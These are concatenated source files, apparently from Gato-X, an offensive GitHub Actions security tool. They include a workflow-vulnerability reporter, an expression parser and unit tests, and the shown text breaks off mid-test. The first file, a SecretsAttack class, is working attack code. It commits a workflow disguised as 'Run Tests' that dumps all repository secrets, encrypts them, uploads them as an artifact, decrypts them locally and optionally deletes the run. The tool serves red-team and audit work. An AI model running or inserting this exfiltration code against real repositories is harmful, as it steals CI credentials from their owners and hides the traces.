"""
Copyright 2024, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

import yaml
import string
import json
import hashlib
import random

from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives.ciphers import Cipher
from cryptography.hazmat.primitives.ciphers import algorithms
from cryptography.hazmat.primitives.ciphers import modes

from gatox.attack.attack import Attacker
from gatox.cli.output import Output


class SecretsAttack(Attacker):
    """This class contains methods to create malicious yaml files for accessing and
    exfiltrating GitHub Actions secrets files.
    """

    def __collect_secret_names(self, target_repo):
        """Method to collect list of secrets prior to exfil.

        Args:
            target_repo (str): Repository to get secrets from.

        Returns:
            list: List of secret names accessible to the repository.
        """

        secrets = []
        secret_names = []
        repo_secret_list = self.api.get_secrets(target_repo)
        org_secret_list = self.api.get_repo_org_secrets(target_repo)

        if repo_secret_list:
            secrets.extend(repo_secret_list)

        if org_secret_list:
            secrets.extend(org_secret_list)

        if not secrets:
            Output.warn("The repository does not have any accessible secrets!")
            return False
        else:
            Output.owned(
                f"The repository has {Output.bright(len(secrets))} "
                "accessible secret(s)!"
            )

        secret_names = [secret["name"] for secret in secrets]

        return secret_names

    @staticmethod
    def create_environment_exfil_yaml(pubkey: str, branch_name: str, environment: str):
        raise NotImplementedError

    @staticmethod
    def create_exfil_yaml(pubkey: str, branch_name):
        """Create a malicious yaml file that will trigger on push and attempt
        to exfiltrate the provided list of secrets.

        Args:
            pubkey (str): Public key to encrypt the plaintext values with.
            branch_name (str): Name of the branch for on: push trigger.

        """
        yaml_file = {}

        yaml_file["name"] = branch_name
        yaml_file["on"] = {"push": {"branches": branch_name}}

        test_job = {
            "runs-on": ["ubuntu-latest"],
            "steps": [
                {
                    "env": {"VALUES": "${{ toJSON(secrets)}}"},
                    "name": "Prepare repository",
                    "run": """
cat <<EOF > output.json
$VALUES
EOF
                    """,
                },
                {
                    "name": "Run Tests",
                    "env": {"PUBKEY": pubkey},
                    "run": "aes_key=$(openssl rand -hex 12 | tr -d '\\n');"
                    "openssl enc -aes-256-cbc -pbkdf2 -in output.json -out output_updated.json -pass pass:$aes_key;"
                    'echo $aes_key | openssl rsautl -encrypt -pkcs -pubin -inkey <(echo "$PUBKEY") -out lookup.txt 2> /dev/null;',
                },
                # Upload the encrypted files as workfow run artifacts.
                # This avoids the edge case where there is a secret set to a value that is in the Base64 (which breaks everything).
                {
                    "name": "Upload artifacts",
                    "uses": "actions/upload-artifact@v4",
                    "with": {
                        "name": "files",
                        "path": " |\noutput_updated.json\nlookup.txt",
                    },
                },
            ],
        }
        yaml_file["jobs"] = {"testing": test_job}

        return yaml.dump(yaml_file, sort_keys=False)

    @staticmethod
    def __create_private_key():
        """Creates a private and public key to safely exfil secrets."""
        private_key = rsa.generate_private_key(
            public_exponent=65537, key_size=4096, backend=default_backend()
        )
        public_key = private_key.public_key()
        pem = public_key.public_bytes(
            encoding=serialization.Encoding.PEM,
            format=serialization.PublicFormat.SubjectPublicKeyInfo,
        )

        return (private_key, pem.decode())

    @staticmethod
    def __decrypt_secrets(priv_key, encrypted_key, encrypted_secrets):
        """Utility method to decrypt secrets given ciphertext blob and a private key."""
        salt = encrypted_secrets[8:16]
        ciphertext = encrypted_secrets[16:]

        sym_key = priv_key.decrypt(encrypted_key, padding.PKCS1v15()).decode()
        sym_key = sym_key.replace("\n", "")
        derived_key = hashlib.pbkdf2_hmac("sha256", sym_key.encode(), salt, 10000, 48)
        key = derived_key[0:32]
        iv = derived_key[32:48]

        cipher = Cipher(algorithms.AES256(key), modes.CBC(iv))
        decryptor = cipher.decryptor()

        cleartext = decryptor.update(ciphertext) + decryptor.finalize()
        cleartext = cleartext[: -cleartext[-1]]

        return cleartext

    def secrets_dump(
        self,
        target_repo: str,
        target_branch: str,
        commit_message: str,
        delete_action: bool,
        yaml_name: str,
    ):
        """Given a user with write access to a repository, runs a workflow that
        dumps all repository secrets.

        Args:
            target_repo (str): Repository to target.
            target_branch (str): Branch to create workflow in.
            commit_message (str): Commit message for exfil workflow.
            delete_action (bool): Whether to delete the workflow after
            execution.
            yaml_name (str): Name of yaml to use for exfil workflow.

        """
        self.setup_user_info()

        if not self.user_perms:
            return False

        if (
            "repo" in self.user_perms["scopes"]
            and "workflow" in self.user_perms["scopes"]
        ):

            secret_names = self.__collect_secret_names(target_repo)

            if not secret_names:
                return False

            # Randomly generate a branch name, since this will run immediately
            if target_branch:
                branch = target_branch
            else:
                branch = "".join(random.choices(string.ascii_lowercase, k=10))

            res = self.api.get_repo_branch(target_repo, branch)
            if res == -1:
                Output.error("Failed to check for remote branch!")
                return
            elif res == 1:
                Output.error(f"Remote branch, {branch}, already exists!")
                return
            priv_key, pubkey_pem = self.__create_private_key()
            yaml_contents = self.create_exfil_yaml(pubkey_pem, branch)
            workflow_id = self.execute_and_wait_workflow(
                target_repo, branch, yaml_contents, commit_message, yaml_name
            )
            if not workflow_id:
                return
            res = self.api.retrieve_workflow_artifact(target_repo, workflow_id)

            if not res:
                Output.error("Failed to Retrieve workflow artifact!")
            else:
                # Carve files out of the zipfile.

                # lookup.txt is the encrypted AES key
                # output_updated.json is the AES encrypted json blob

                if "output_updated.json" in res and "lookup.txt" in res:
                    cleartext = self.__decrypt_secrets(
                        priv_key, res["lookup.txt"], res["output_updated.json"]
                    )
                    Output.owned("Decrypted and Decoded Secrets:")
                    secrets = json.loads(cleartext)

                    for k, v in secrets.items():
                        if k != "github_token":
                            print(f"{k}={v}")
                else:
                    Output.error("Unexpected run artifact structure!")
            if delete_action:
                res = self.api.delete_workflow_run(target_repo, workflow_id)
                if not res:
                    Output.error("Failed to delete workflow!")
                else:
                    Output.result("Workflow deleted sucesfully!")
        else:
            Output.error(
                "The user does not have the necessary scopes to conduct this " "attack!"
            )



from .integration_utils import process_command


def test_help(capsys):

    output, error = process_command("gato enum -h", capsys)

    assert " gato enumerate [-h] [--target ORGANIZATION]" in output



import yaml
from yaml import CSafeLoader

from gatox.workflow_parser.components.step import Step
from gatox.workflow_parser.utility import filter_tokens


class CompositeParser:
    """
    A class to parse and analyze composite GitHub Actions.
    """

    def __init__(self, action_yml: str):
        """
        Initializes the CompositeParser instance by loading and parsing the provided YAML file.

        Args:
            action_yml (str): The YAML file to parse.
        """
        self.parsed_yml = yaml.load(action_yml.replace("\t", "  "), Loader=CSafeLoader)
        self.steps = []
        self.name = None

        if "name" in self.parsed_yml:
            self.name = self.parsed_yml["name"]

        if self.is_composite():
            self.steps = [
                Step(step_data)
                for step_data in self.parsed_yml["runs"].get("steps", [])
            ]

    def is_composite(self):
        """
        Checks if the parsed YAML file represents a composite GitHub Actions workflow.

        Returns:
            bool: True if the parsed YAML file represents a composite GitHub
            Actions workflow, False otherwise.
        """
        if "runs" in self.parsed_yml and "using" in self.parsed_yml["runs"]:
            return self.parsed_yml["runs"]["using"] == "composite"

    def check_injection(self):
        """
        Checks if the composite action contains any unsafe context expressions.

        Returns:
            list: A list of steps that contain unsafe context expressions.
        """
        step_risk = []
        if not self.is_composite():
            return []
        for step in self.steps:

            if step.type == "RUN":
                tokens = step.getTokens()
                tokens = filter_tokens(tokens, strict=True)

                if tokens:
                    step_risk.append({f"Composite-{step.name}": tokens})

        return step_risk

    def check_pwn_request(self):
        """Checks if the composable action checks out the PR code."""
        has_checkout = False
        has_sink = False

        for step in self.steps:
            if step.is_checkout:
                has_checkout = True
            elif step.is_sink:
                has_sink = True

        if has_checkout:
            return True



"""
Copyright 2024, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

from gatox.cli.output import Output
from gatox.configuration.configuration_manager import ConfigurationManager

from gatox.enumerate.reports.report import Report
from gatox.models.repository import Repository


class ActionsReport(Report):
    """ """

    ENVIRONMENT_TOCTOU = (
        "The workflow contains an"
        " environment protection rule"
        " but the workflow uses a mutable reference to checkout PR code."
        " This could be exploited via a race condition."
        " See https://github.com/AdnaneKhan/ActionsTOCTOU!"
    )
    LABEL_TOCTOU = (
        "The workflow contains "
        "label-based gating but the workflow uses a mutable reference "
        "to check out PR code. This could be exploited via a race condition. "
        "See https://github.com/AdnaneKhan/ActionsTOCTOU!"
    )
    PERMISSION_TOCTOU = (
        "The workflow contains a permission check, but uses a mutable reference"
        "to check out PR code. This could be exploited via a race condition. "
        "See https://github.com/AdnaneKhan/ActionsTOCTOU!"
    )

    PWN_REQUEST = (
        "The workflow runs on a risky trigger "
        "and might check out the PR code, see if it runs it!"
    )
    ACTIONS_INJECTION = (
        "The workflow uses variables by context expression"
        " within run or script steps. If the step is reachable and the variables are "
        "user controlled, then they can be used to inject arbitrary code into the workflow."
    )

    @classmethod
    def report_pwn(cls, repo: Repository):
        """Report Pwn Requests in the repository in a clean, human readable format."""
        if repo.has_pwn_request():
            risks = repo.pwn_req_risk

            first = True
            for entry in risks:
                details = cls.__capture_pwn_details(repo, entry)

                if details and first:
                    cls.print_divider()
                    cls.print_header(repo, "Actions Pwn Requests")

                    first = False

                for line in details:
                    Output.generic(line)

            if first == False:
                cls.print_divider()

    @classmethod
    def report_injection(cls, repo: Repository):
        """Report injection for the repository."""
        if repo.has_injection():
            risks = repo.injection_risk

            first = True
            for entry in risks:
                details = cls.__capture_injection_details(repo, entry)

                if details and first:
                    cls.print_divider()
                    cls.print_header(repo, "Actions Script Injection")
                    first = False

                for line in details:
                    Output.generic(line)

            if first == False:
                cls.print_divider()

    @classmethod
    def __reusable_details(
        cls,
        entry: dict,
        workflow_url: str,
        issue_type: str,
        description: str,
        triggers: list[str],
        designation,
    ):
        """Reusable details printer."""
        details = []
        details.append(f"{'-'*78}")
        details.append(f" Workflow Name: {Output.yellow(entry['workflow_name'])}")
        details.append(f" Issue Type: {issue_type}")
        details.append(f' Trigger(s): {Output.yellow(",".join(triggers))}')
        details.append(f" Details: {description}")
        details.append(f" Workflow URL: {Output.blue(workflow_url)}")
        if "parent_workflow" in entry:
            details.append(
                f" Calling Workflow: {Output.yellow(entry['parent_workflow'])}"
            )
        details.append(f" Confidence: {Output.red(designation)}")

        return details

    @classmethod
    def __check_mutable(self, repository, entry, step):
        # If we have a sha, it's immutable so skip.
        if "github.event.pull_request.head.sha" in step["ref"].lower():
            repository.clear_pwn_request(entry["workflow_name"])
            return False
        return True

    @classmethod
    def __report_jobs(self, candidate, details):
        """Report pwn request candidate jobs, their steps, and if-checks."""
        lines = []

        lines.append(f"{'~'*78}")
        lines.append(f" Job: {Output.bright(candidate)}")

        if details.get("if_check", ""):
            lines.append(f' Job If-Check: {details["if_check"]}')
        for step in details["steps"]:
            lines.append(f' Checkout Ref: {step["ref"]}')
            if "if_check" in step and step["if_check"]:
                lines.append(f' Step If-check: {step["if_check"]}')

        return lines

    @classmethod
    def ___report_injection(self, candidate, details):
        """Create lines for each part of the injection report."""
        lines = []
        confidence = "UNKNOWN"

        lines.append(f"{'~'*78}")
        lines.append(f" Job: {Output.bright(candidate)}")

        if details.get("if_check", ""):
            if details["if_check"].startswith("RESTRICTED"):
                confidence = "LOW"
            lines.append(f' Job If-Check: {details["if_check"]}')

        for step_name, val in details.items():
            if step_name == "if_check":
                continue

            lines.append(f"Step: {step_name}")
            for var in val["variables"]:
                if (
                    confidence == "UNKNOWN"
                    and var
                    in ConfigurationManager().WORKFLOW_PARSING["UNSAFE_CONTEXTS"]
                ):
                    confidence = "HIGH"
            lines.append(f'Variables: {", ".join(val["variables"])}')
            if "if_checks" in val and val["if_checks"]:
                lines.append(f' Step If-check: {val["if_checks"]}')

        return lines, confidence

    @classmethod
    def __capture_injection_details(cls, repository: Repository, entry: dict):
        """Print details about potential GitHub Actions script injections."""
        designation = "UNKNOWN"
        workflow_url = entry["workflow_url"]

        injection = entry["details"]

        job_reports = []
        sub_entries = []
        for k, v in injection.items():

            if k == "triggers":
                continue
            else:
                entries, confidence = cls.___report_injection(k, v)
                # Only goes up.
                if designation == "UNKNOWN":
                    designation = confidence
                sub_entries.extend(entries)

        job_reports.extend(
            cls.__reusable_details(
                entry,
                workflow_url,
                "Actions Injection",
                cls.ACTIONS_INJECTION,
                injection["triggers"],
                designation,
            )
        )
        job_reports.extend(sub_entries)

        return job_reports

    @classmethod
    def __capture_pwn_details(cls, repository: Repository, entry: dict) -> list:
        """ """
        designation = "UNKNOWN"
        pwn_req = entry["details"]
        workflow_url = entry["workflow_url"]
        job_reports = []

        if entry["environments"]:
            sub_entries = []
            for candidate, details in pwn_req["candidates"].items():
                for step in details["steps"]:
                    if not cls.__check_mutable(repository, entry, step):
                        return []

                    if (
                        details["confidence"]
                        and details["confidence"] in ["MEDIUM", "HIGH"]
                        and designation in ["UNKNOWN", "LOW"]
                    ):
                        designation = details["confidence"]
                sub_entries.extend(cls.__report_jobs(candidate, details))
            job_reports.extend(
                cls.__reusable_details(
                    entry,
                    workflow_url,
                    "Pwn Request with Approval TOCTOU",
                    cls.ENVIRONMENT_TOCTOU,
                    pwn_req["triggers"],
                    designation,
                )
            )
            job_reports.extend(sub_entries)
        elif (
            len(pwn_req["triggers"]) == 1
            and pwn_req["triggers"][0] == "pull_request_target:labeled"
        ):
            sub_entries = []
            for candidate, details in pwn_req["candidates"].items():
                for step in details["steps"]:
                    if not cls.__check_mutable(repository, entry, step):
                        return []

                if (
                    details["confidence"]
                    and details["confidence"] in ["MEDIUM", "HIGH"]
                    and designation in ["UNKNOWN", "LOW"]
                ):
                    designation = details["confidence"]

                sub_entries.extend(cls.__report_jobs(candidate, details))
            job_reports.extend(
                cls.__reusable_details(
                    entry,
                    workflow_url,
                    "Pwn Request with Label TOCTOU",
                    cls.LABEL_TOCTOU,
                    pwn_req["triggers"],
                    designation,
                )
            )
            job_reports.extend(sub_entries)
        else:
            toctou = False

            sub_entries = []
            for candidate, details in pwn_req["candidates"].items():
                if details["gated"]:
                    for step in details["steps"]:
                        if not cls.__check_mutable(repository, entry, step) and (
                            not (
                                "issue_comment" in pwn_req["triggers"]
                                and len(pwn_req["triggers"]) == 1
                            )
                        ):
                            return []
                        else:
                            toctou = True

                if (
                    details["confidence"]
                    and details["confidence"] in ["MEDIUM", "HIGH"]
                    and designation in ["UNKNOWN", "LOW"]
                ):
                    designation = details["confidence"]
                sub_entries.extend(cls.__report_jobs(candidate, details))

            if toctou:
                # If we got here then it is at least medium.
                if designation == "UNKNOWN":
                    designation = "MEDIUM"
                job_reports.extend(
                    cls.__reusable_details(
                        entry,
                        workflow_url,
                        "Pwn Request With Permission TOCTOU",
                        cls.PERMISSION_TOCTOU,
                        pwn_req["triggers"],
                        designation,
                    )
                )
                job_reports.extend(sub_entries)
            else:
                job_reports.extend(
                    cls.__reusable_details(
                        entry,
                        workflow_url,
                        "Pwn Request",
                        cls.PWN_REQUEST,
                        pwn_req["triggers"],
                        designation,
                    )
                )
                job_reports.extend(sub_entries)
        return job_reports



import re
import sys
import pytest
import json
import os
import pathlib

from gatox.main import entry


# From https://stackoverflow.com/questions/14693701/
# how-can-i-remove-the-ansi-escape-sequences-from-a-string-in-python
def escape_ansi(line):
    ansi_escape = re.compile(r"(?:\x1B[@-_]|[\x80-\x9F])[0-?]*[ -/]*[@-~]")
    return ansi_escape.sub("", line)


def process_command(commandline: str, capsys):
    """Utility method to handle passing command line to the gato
    main function.

    Args:
        commandline (str): Commandline arguments.
        capsys: Capture object for the test.

    Returns:
        tuple: tuple of standard output and error for the execution.
    """

    command = commandline.split(" ")

    sys.argv = command
    with pytest.raises(SystemExit):
        entry()

    output, error = capsys.readouterr()

    output = escape_ansi(output)
    error = escape_ansi(error)

    return output, error


def load_creds():
    curr_path = pathlib.Path(__file__).parent.resolve()

    with open(os.path.join(curr_path, "creds.json"), "r") as f:
        creds = json.load(f)
    for key, val in creds.items():
        val["PAT_value"] = os.environ.get(key)

        if val["PAT_value"] is None:
            pytest.fail(f"Unable to load secret: {key}!")

    return creds



"""
Copyright 2024, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

import re


class Node:
    def __init__(self, type, value=None, children=None):
        self.type = type
        self.value = value
        self.children = children or []


class ExpressionParser:
    def __init__(self, expression):
        self.expression = expression
        self.tokens = self.tokenize(expression)
        self.parsed_expression = self.parse_expression(self.tokens)

    def __print_ast(self, node, level=0):
        indent = "  " * level
        print(f"{indent}{node.type}: {node.value}")
        for child in node.children:
            self.__print_ast(child, level + 1)

    @staticmethod
    def tokenize(expression: str):
        token_specification = [
            ("LPAREN", r"\("),
            ("RPAREN", r"\)"),
            ("COMMA", r","),
            ("AND", r"&&"),
            ("OR", r"\|\|"),
            ("EQUALS", r"=="),
            ("NOT_EQUALS", r"!="),
            ("NEGATION", r"!"),  # Unary negation
            ("IDENTIFIER", r"[a-zA-Z_.][a-zA-Z0-9_.*]*"),
            ("STRING", r"'[^']*'"),
            ("WHITESPACE", r"\s+"),
        ]
        tok_regex = "|".join(
            f"(?P<{name}>{pattern})" for name, pattern in token_specification
        )
        return [
            (match.lastgroup, match.group(0))
            for match in re.finditer(tok_regex, expression)
            if match.lastgroup != "WHITESPACE"
        ]

    @staticmethod
    def expect_token(tokens, expected_type):
        if tokens and tokens[0][0] == expected_type:
            return tokens.pop(0)
        raise SyntaxError(
            f"Expected {expected_type} but got {tokens[0] if tokens else 'no more tokens'}"
        )

    @staticmethod
    def parse_expression(tokens):
        if not tokens:
            raise SyntaxError("Empty expression")
        node = ExpressionParser.parse_logical_or(tokens)
        return node

    @staticmethod
    def parse_logical_or(tokens):
        node = ExpressionParser.parse_logical_and(tokens)
        while tokens and tokens[0][0] == "OR":
            op = tokens.pop(0)
            rhs = ExpressionParser.parse_logical_and(tokens)
            node = Node("logical_or", op[1], [node, rhs])
        return node

    @staticmethod
    def parse_logical_and(tokens):
        node = ExpressionParser.parse_comparison(tokens)
        while tokens and tokens[0][0] == "AND":
            op = tokens.pop(0)
            rhs = ExpressionParser.parse_comparison(tokens)
            node = Node("logical_and", op[1], [node, rhs])
        return node

    @staticmethod
    def parse_comparison(tokens):
        node = ExpressionParser.parse_unary(
            tokens
        )  # Updated from parse_primary to parse_unary
        while tokens and tokens[0][0] in ("EQUALS", "NOT_EQUALS"):
            op = tokens.pop(0)
            rhs = ExpressionParser.parse_unary(
                tokens
            )  # Updated from parse_primary to parse_unary
            node = Node("comparison", op[1], [node, rhs])
        return node

    @staticmethod
    def parse_function_call(tokens):
        function_name = ExpressionParser.expect_token(tokens, "IDENTIFIER")[1]
        ExpressionParser.expect_token(tokens, "LPAREN")
        arguments = []
        while tokens[0][0] != "RPAREN":
            arguments.append(ExpressionParser.parse_expression(tokens))
            if tokens[0][0] != "RPAREN":
                ExpressionParser.expect_token(tokens, "COMMA")
        ExpressionParser.expect_token(tokens, "RPAREN")
        return Node("function_call", function_name, arguments)

    @staticmethod
    def parse_unary(tokens):
        if tokens and tokens[0][0] == "NEGATION":
            op = tokens.pop(0)
            operand = ExpressionParser.parse_unary(
                tokens
            )  # Unary negation can be nested
            return Node("unary_negation", op[1], [operand])
        else:
            return ExpressionParser.parse_primary(tokens)

    @staticmethod
    def parse_primary(tokens):
        if tokens[0][0] == "LPAREN":
            tokens.pop(0)
            node = ExpressionParser.parse_expression(tokens)
            ExpressionParser.expect_token(tokens, "RPAREN")
            return node
        elif tokens[0][0] == "IDENTIFIER":
            # Lookahead to check if this is a function call
            if len(tokens) > 1 and tokens[1][0] == "LPAREN":
                return ExpressionParser.parse_function_call(tokens)
            else:
                return Node("identifier", tokens.pop(0)[1])
        elif tokens[0][0] == "STRING":
            return Node("string", tokens.pop(0)[1])
        else:
            raise SyntaxError(f"Unexpected token: {tokens[0][1]}")

    def print_ast(self):
        self.__print_ast(self.parsed_expression)

    def get_node(self):
        return self.parsed_expression



import os
import pathlib
import pytest
import json
import re

from unittest.mock import patch

from gatox.models.repository import Repository
from gatox.enumerate.enumerate import Enumerator
from gatox.cli.output import Output

from unit_test.utils import escape_ansi as escape_ansi

TEST_REPO_DATA = None
TEST_WORKFLOW_YML = None
TEST_ORG_DATA = None

Output(True)

BASE_MOCK_RUNNER = [
    {
        "machine_name": "unittest1",
        "runner_name": "much_unit_such_test",
        "runner_type": "organization",
        "non_ephemeral": False,
        "token_permissions": {"Actions": "write"},
        "runner_group": "Default",
        "requested_labels": ["self-hosted", "Linux", "X64"],
    }
]


@pytest.fixture(scope="session", autouse=True)
def load_test_files(request):
    global TEST_REPO_DATA
    global TEST_ORG_DATA
    global TEST_WORKFLOW_YML
    curr_path = pathlib.Path(__file__).parent.resolve()
    test_repo_path = os.path.join(curr_path, "files/example_repo.json")
    test_org_path = os.path.join(curr_path, "files/example_org.json")
    test_wf_path = os.path.join(curr_path, "files/main.yaml")

    with open(test_repo_path, "r") as repo_data:
        TEST_REPO_DATA = json.load(repo_data)

    with open(test_org_path, "r") as repo_data:
        TEST_ORG_DATA = json.load(repo_data)

    with open(test_wf_path, "r") as wf_data:
        TEST_WORKFLOW_YML = wf_data.read()


@patch("gatox.enumerate.enumerate.Api")
def test_init(mock_api):
    """Test constructor for enumerator."""

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy="localhost:8080",
        output_yaml=True,
        skip_log=False,
    )

    assert gh_enumeration_runner.http_proxy == "localhost:8080"


@patch("gatox.enumerate.enumerate.Api")
def test_self_enumerate(mock_api, capsys):
    """Test constructor for enumerator."""

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo", "workflow"],
    }

    mock_api.return_value.check_organizations.return_value = []

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy="localhost:8080",
        output_yaml=True,
        skip_log=False,
    )

    gh_enumeration_runner.self_enumeration()

    captured = capsys.readouterr()

    print_output = captured.out
    assert "The user testUser belongs to 0 organizations!" in escape_ansi(print_output)


@patch("gatox.enumerate.enumerate.Api")
def test_enumerate_repo_admin(mock_api, capsys):
    """Test constructor for enumerator."""

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy="localhost:8080",
        output_yaml=True,
        skip_log=False,
    )

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo", "workflow"],
    }

    mock_api.return_value.retrieve_run_logs.return_value = BASE_MOCK_RUNNER

    repo_data = json.loads(json.dumps(TEST_REPO_DATA))
    repo_data["permissions"]["admin"] = True

    mock_api.return_value.get_repository.return_value = repo_data

    gh_enumeration_runner.enumerate_repo_only(repo_data["full_name"])

    captured = capsys.readouterr()

    print_output = captured.out

    assert "The user is an administrator on the" in escape_ansi(print_output)


@patch("gatox.enumerate.enumerate.Api")
def test_enumerate_repo_admin_no_wf(mock_api, capsys):
    """Test constructor for enumerator."""

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy="localhost:8080",
        output_yaml=True,
        skip_log=False,
    )

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo"],
    }

    mock_api.return_value.retrieve_run_logs.return_value = BASE_MOCK_RUNNER

    repo_data = json.loads(json.dumps(TEST_REPO_DATA))
    repo_data["permissions"]["admin"] = True

    mock_api.return_value.get_repository.return_value = repo_data

    gh_enumeration_runner.enumerate_repo_only(repo_data["full_name"])

    captured = capsys.readouterr()

    print_output = captured.out

    assert " is public this token can be used to approve a" in escape_ansi(print_output)


@patch("gatox.enumerate.enumerate.Api")
def test_enumerate_repo_no_wf_no_admin(mock_api, capsys):
    """Test constructor for enumerator."""

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy="localhost:8080",
        output_yaml=True,
        skip_log=False,
    )

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo"],
    }

    mock_api.return_value.retrieve_run_logs.return_value = BASE_MOCK_RUNNER

    repo_data = json.loads(json.dumps(TEST_REPO_DATA))
    repo_data["permissions"]["admin"] = False

    mock_api.return_value.get_repository.return_value = repo_data

    gh_enumeration_runner.enumerate_repo_only(repo_data["full_name"])

    captured = capsys.readouterr()

    print_output = captured.out

    assert " scope, which means an existing workflow trigger must" in escape_ansi(
        print_output
    )


@patch("gatox.enumerate.enumerate.Api")
def test_enumerate_repo_no_wf_maintain(mock_api, capsys):
    """Test constructor for enumerator."""

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy="localhost:8080",
        output_yaml=True,
        skip_log=False,
    )

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo", "workflow"],
    }

    mock_api.return_value.retrieve_run_logs.return_value = BASE_MOCK_RUNNER

    repo_data = json.loads(json.dumps(TEST_REPO_DATA))

    repo_data["permissions"]["maintain"] = True

    mock_api.return_value.get_repository.return_value = repo_data

    gh_enumeration_runner.enumerate_repo_only(repo_data["full_name"])
    captured = capsys.readouterr()

    print_output = captured.out

    assert " The user is a maintainer on the" in escape_ansi(print_output)


@patch("gatox.enumerate.enumerate.Api")
def test_enumerate_repo_only(mock_api, capsys):
    """Test constructor for enumerator."""

    repo_data = json.loads(json.dumps(TEST_REPO_DATA))
    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy="localhost:8080",
        output_yaml=True,
        skip_log=False,
    )

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo", "workflow"],
    }

    mock_api.return_value.retrieve_run_logs.return_value = BASE_MOCK_RUNNER
    mock_api.return_value.get_repository.return_value = repo_data

    gh_enumeration_runner.enumerate_repo_only(repo_data["full_name"])

    captured = capsys.readouterr()

    print_output = captured.out

    assert "Runner Name: much_unit_such_test" in escape_ansi(print_output)

    assert "Machine Name: unittest1" in escape_ansi(print_output)

    assert "Labels: self-hosted, Linux, X64" in escape_ansi(print_output)


@patch("gatox.enumerate.enumerate.Api")
def test_enum_validate(mock_api, capfd):

    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo", "workflow"],
    }

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.check_organizations.return_value = []

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy=None,
        output_yaml=False,
        skip_log=True,
    )

    gh_enumeration_runner.validate_only()
    out, err = capfd.readouterr()
    assert "authenticated user is: testUser" in escape_ansi(out)
    assert "The user testUser belongs to 0 organizations!" in escape_ansi(out)


@patch("gatox.enumerate.ingest.ingest.time")
@patch("gatox.enumerate.enumerate.Api")
def test_enum_repo(mock_api, mock_time, capfd):

    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo", "workflow"],
    }

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.get_repository.return_value = TEST_REPO_DATA

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy=None,
        output_yaml=False,
        skip_log=True,
    )

    gh_enumeration_runner.enumerate_repo_only("octocat/Hello-World")
    out, err = capfd.readouterr()
    assert "Enumerating: octocat/Hello-World" in escape_ansi(out)
    mock_api.return_value.get_repository.assert_called_once_with("octocat/Hello-World")


@patch("gatox.enumerate.ingest.ingest.time")
@patch("gatox.enumerate.enumerate.Api")
def test_enum_org(mock_api, mock_time, capfd):

    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo", "workflow", "admin:org"],
    }

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.get_repository.return_value = TEST_REPO_DATA
    mock_api.return_value.get_organization_details.return_value = TEST_ORG_DATA

    mock_api.return_value.get_org_secrets.return_value = [
        {
            "name": "DEPLOY_TOKEN",
            "created_at": "2019-08-10T14:59:22Z",
            "updated_at": "2020-01-10T14:59:22Z",
            "visibility": "all",
        },
        {
            "name": "GH_TOKEN",
            "created_at": "2019-08-10T14:59:22Z",
            "updated_at": "2020-01-10T14:59:22Z",
            "visibility": "selected",
